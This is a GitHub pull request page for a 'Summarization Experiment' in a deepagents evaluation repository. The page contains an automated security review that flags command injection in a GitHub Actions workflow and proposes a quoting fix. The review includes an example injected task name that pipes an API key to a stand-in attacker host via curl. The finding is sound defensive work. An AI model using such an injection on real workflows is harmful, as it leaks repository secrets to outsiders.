Skip to content

Summarization Experiment#2711

Open
Maahir Sachdev (maahir30) wants to merge 5 commits intomainfrom
cat-experiment
Open

Summarization Experiment#2711
Maahir Sachdev (maahir30) wants to merge 5 commits intomainfrom
cat-experiment

Conversation

@maahir30
Copy link
Copy Markdown
Contributor

@maahir30 Maahir Sachdev (maahir30) commented Apr 13, 2026

@github-actions github-actions Bot added deepagents Related to the `deepagents` SDK / agent harness evals Evaluation suite and Harbor integration github_actions PR touching `.github` internal User is a member of the `langchain-ai` GitHub organization size: M 200-499 LOC labels Apr 13, 2026
@maahir30 Maahir Sachdev (maahir30) changed the base branch from main to simplify-harbor April 13, 2026 23:59
corridor-security[bot]
corridor-security Bot reviewed Apr 14, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@corridor-security corridor-security Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Security Issues

  • Command Injection in GitHub Actions workflow
    User-controlled input from workflow_dispatch (task_names / task_names_override) is split and directly appended to a shell command without quoting: task_name_flags="$task_name_flags --task-name $task", then expanded unquoted in the uv run invocation. A malicious task name (e.g., containing ;, backticks, or $(...)) can break out of the argument context and execute arbitrary shell commands on the GitHub Actions runner. Since this job loads repository secrets (e.g., ANTHROPIC_API_KEY, OPENROUTER_API_KEY, etc.), an attacker with permission to trigger the workflow could exfiltrate secrets.

.github/workflows/harbor.yml (line 390)

Untrusted workflow inputs (task_names / task_names_override) are split and appended to a shell command without quoting, enabling command injection on the Actions runner.

Vulnerable construction:

for task in "${TASKS[@]}"; do
  task=$(echo "$task" | xargs)
  task_name_flags="$task_name_flags --task-name $task"
done
...
uv run harbor run \
  ... \
  $task_name_flags \
  --jobs-dir jobs/terminal-bench \
  ...

An attacker who can trigger this workflow_dispatch could supply a task name like foo; curl https://attacker.tld/x?$ANTHROPIC_API_KEY to execute arbitrary commands and exfiltrate secrets configured for the job.

Remediation options:

  • Safely quote each dynamic argument when building flags (e.g., using printf '%q').
  • Prefer Bash arrays for argument construction and expansion: args+=(--task-name "$task") and later uv run ... "${args[@]}".

Minimal single-line fix for the vulnerable line:

              task_name_flags="$task_name_flags --task-name $(printf '%q' "$task")"

For more details, see the finding in Corridor.

Provide feedback: Reply with whether this is a valid vulnerability or false positive to help improve Corridor's accuracy.

@github-actions github-actions Bot added the cli Related to `deepagents-cli` label Apr 14, 2026
@codspeed-hq
Copy link
Copy Markdown

codspeed-hq Bot commented Apr 14, 2026
edited
Loading

Merging this PR will not alter performance

✅ 32 untouched benchmarks
⏩ 15 skipped benchmarks1

Comparing cat-experiment (ba7a620) with main (6e57731)2

Open in CodSpeed

Footnotes

  1. 15 benchmarks were skipped, so the baseline results were used instead. If they were deleted from the codebase, click here and archive them to remove them from the performance reports.

  2. No successful run was found on simplify-harbor (eaae7e7) during the generation of this report, so main (6e57731) was used instead as the comparison base. There might be some changes unrelated to this pull request in this report.

Base automatically changed from simplify-harbor to main April 16, 2026 21:31
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@corridor-security corridor-security[bot] corridor-security[bot] left review comments

@mdrxy Mason Daugherty (mdrxy) Awaiting requested review from mdrxy mdrxy is a code owner

@vtrivedy vivek (vtrivedy) Awaiting requested review from vtrivedy vtrivedy is a code owner

@eyurtsev Eugene Yurtsev (eyurtsev) Awaiting requested review from eyurtsev eyurtsev is a code owner

Assignees

No one assigned

Labels

cli Related to `deepagents-cli` deepagents Related to the `deepagents` SDK / agent harness evals Evaluation suite and Harbor integration github_actions PR touching `.github` internal User is a member of the `langchain-ai` GitHub organization size: M 200-499 LOC

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@maahir30